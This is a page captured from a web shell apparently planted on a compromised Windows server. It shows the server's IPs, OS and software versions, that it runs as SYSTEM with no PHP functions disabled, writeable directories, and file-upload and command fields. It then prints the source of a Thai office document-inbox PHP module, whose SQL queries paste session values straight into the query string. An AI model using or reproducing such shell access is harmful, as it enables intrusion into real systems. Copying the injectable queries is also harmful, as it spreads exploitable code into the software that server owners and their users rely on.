403Webshell
Server IP : 172.67.187.206  /  Your IP : 172.71.28.155
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/myoffice/2565/modules/tkk7/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/myoffice/2565/modules/tkk7/index.php
<?
CheckUsersch($_SESSION['usersch_user'], $_SESSION['usersch_pwd']);
?>
<TABLE cellSpacing=0 cellPadding=0 width=100% align=center  border=0>
      <TBODY>
        <TR>
          <TD vAlign=top>
<?
//	CheckUser($_SESSION['user_user']);
		$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE username='".$_SESSION['usersch_user']."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
?> 
  <table width=1005   border="0" align="right" cellpadding="0" cellspacing="0">
    <tr class="unnamed1">
		<td  width="1000"  class="unnamed2"><A HREF="?name=tkk7&file=index">&nbsp;&nbsp;<img src="images/back.png" align="absmiddle" ></A>&nbsp;&nbsp;<B>เอกสารเข้าใหม่&nbsp;ของ&nbsp;<? echo $arr[usersch][name];?></B></td>
    </tr>
  </table>
  </TD>
  </TR>
  <TR>
  <TD>
<TABLE cellSpacing=0 cellPadding=0 width=100%  height=500 align=center  border=0>
      <TBODY>
        <TR>
          <TD vAlign=top>
<TABLE width="100%" align=center cellSpacing=1 cellPadding=1 border=0>
  <tr bgcolor="#6dbae0" height=25>
		<td  align=center width="5%"><font color="#FFFFFF"><B></B></font></td>
		<td  align=center width="10%"><font color="#FFFFFF"><B>เลขหนังสือ</B></font></td>
		<td  align=center width="50%"><font color="#FFFFFF"><B>เรื่อง</B></font></td>
		<td width="20%" align=center ><font color="#FFFFFF"><B>จาก</B></font></td>
		<td width="5%"  align=center ><font color="#FFFFFF"><B>ดูเอกสาร</B></font></td>
		<td width="10%" align=center ><font color="#FFFFFF"><B>สถานะ</B></font></td>
  </tr>  
 <?
//	CheckUser($_SESSION['user_user']);
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE username='".$_SESSION['usersch_user']."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
$res[tkk7] = $db->select_query("SELECT * FROM ".TB_TKK7." WHERE category like '%,".$arr[usersch][id].",%'  ORDER by update_date DESC ");
$count=0;
$i=1;
while($arr[tkk7] = $db->fetch($res[tkk7]))
	{
	//Check Comment
	$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[comment] = $db->select_query("SELECT * FROM ".TB_TKK7_COMMENT." WHERE tkk7_id='".$arr[tkk7][id]."' and catno='".$arr[usersch][id]."' ORDER BY id ");
	$arr[comment] = $db->fetch($res[comment]);		


?>

  <?
		if(($arr[tkk7][id]!=$arr[comment][tkk7_id])AND($arr[usersch][id]!=$arr[comment][catno])){ 	  
?>
			<tr bgcolor=#FFFFFF>
			<td valign="top"align="center" ><IMG SRC="images/krut.png" width="15"></td> 
			<td valign="top"><font color="#FF0000"><?echo $arr[tkk7][tabain];?></font></td> 
			<td valign="top"><font color="#FF0000"><IMG SRC="myoffice/<? echo $arr[tkk7][praphet];?>.png" Width=10 Height=10>&nbsp;&nbsp;<?echo $arr[tkk7][topic];?></font>
<BR><b>เอกสาร : </b>
<?
					 if($arr[tkk7][full_text]){ 	  
?>
<a href="data/tkk7/<?=$arr[tkk7][full_text];?>" target="_blank"><b>หนังสือนำ</b></A>
<? } else {echo "";}?>
 <?
					 if($arr[tkk7][full_texts]){ 	  
?>
<a href="data/tkk7/<?=$arr[tkk7][full_texts];?>" target="_blank"><b>สิ่งที่ส่งมาด้วย  1</b></A>
<? } else {echo "";}?>
<?
					 if($arr[tkk7][full_textu]){ 	  
?>
<a href="data/tkk7/<?=$arr[tkk7][full_textu];?>" target="_blank"><b>สิ่งที่ส่งมาด้วย  2</b></A>
<? } else {echo "";}?>
<?
					 if($arr[tkk7][full_texto]){ 	  
?>
<a href="data/tkk7/<?=$arr[tkk7][full_texto];?>" target="_blank"><b>สิ่งที่ส่งมาด้วย  3</b></A>
<? } else {echo "";}?>
			</td>
			<td valign="top"align="center" >
 <?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
	$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE id='".$arr[tkk7][posted]."' ORDER BY id ");
	$arr[usersch] = $db->fetch($res[usersch]);	
?>	
			<font color="#FF0000"><? echo $arr[usersch][name];?></font>
			</td>
			<td valign="top"align="center" ><A HREF="?name=tkk7&file=readtkk7_1&id=<?echo $arr[tkk7][id];?>"><FONT COLOR="#FF0000" ><img src="images/read.png" width=20/></td>
			<td valign="top"><CENTER> 

 <?
$db->connectdb(DB_NAME,DB_USERNAME,DB_PASSWORD);
		$res[usersch] = $db->select_query("SELECT * FROM ".TB_usersch." WHERE username='".$_SESSION['usersch_user']."' ");
		$arr[usersch] = $db->fetch($res[usersch]);
?>
	<FORM NAME="form2" METHOD=POST ACTION="?name=tkk7&file=comment&id=<?echo $arr[tkk7][id];?>">
	<INPUT TYPE="hidden" NAME="CATNO" style="width:150" VALUE="<?=$arr[usersch][id];?> "  readonly style=\"color: #FF0000" >
	<INPUT TYPE="submit" value="จัดเก็บ"name="submit"style="background-color:#DFD95E">
            </FORM>
 </CENTER></td>
		</tr>
            <tr>
             <td colspan="5" height="1" class="dotline" color=FFFF00></td>
            </tr>
			<?
			}
			?>
<?
$count++;
$i++;
if (($count%1) == 0) { echo ""; $count=0; }
}
$db->closedb ();
//จบการแสดงข่าวสาร
?> 																																
</table>
 </form>		

</TR>
</TD>
</TABLE>
		  </TD>
        </TR>
      </TBODY>
    </TABLE>

Youez - 2016 - github.com/yon3zu
LinuXploit